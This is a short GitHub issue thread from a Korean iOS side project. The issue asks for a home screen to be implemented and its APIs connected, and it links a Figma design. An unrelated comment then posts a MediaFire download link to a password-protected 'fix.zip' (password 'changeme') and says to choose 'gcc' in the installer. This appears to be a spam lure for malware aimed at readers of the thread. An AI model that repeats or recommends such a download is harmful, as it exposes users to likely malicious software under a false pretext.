### ISSUE TITLE
홈 화면 구현

### ISSUE THREAD

**Issue by seungyooooong** [dnd-side-project/dnd-11th-2-iOS#41]
## Link
- [figma](https://www.figma.com/design/h7lpD6mTyJK87M9gRF0sSi/DND-2%EC%A1%B0?node-id=778-12722&t=6u4JCsPViXeZUfMc-4)

## Summary
- 홈 화면을 구현해요
- 홈 화면에서 필요한 API를 연결해요

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
